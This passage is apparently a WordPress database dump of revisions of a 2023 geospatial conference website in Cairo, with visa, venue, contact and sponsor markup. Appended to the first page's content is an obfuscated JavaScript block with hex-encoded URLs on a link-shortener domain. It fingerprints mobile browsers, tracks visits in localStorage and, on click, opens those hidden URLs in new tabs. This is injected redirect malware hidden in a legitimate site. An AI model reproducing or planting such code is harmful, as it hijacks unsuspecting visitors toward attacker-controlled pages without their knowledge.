main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:28:55','2023-08-16 00:28:55','',3066,'https://gsw2023.com/?p=5256',0,'revision','',0),
(5257,1,'2023-08-16 00:29:24','2023-08-16 00:29:24','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145556440{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a 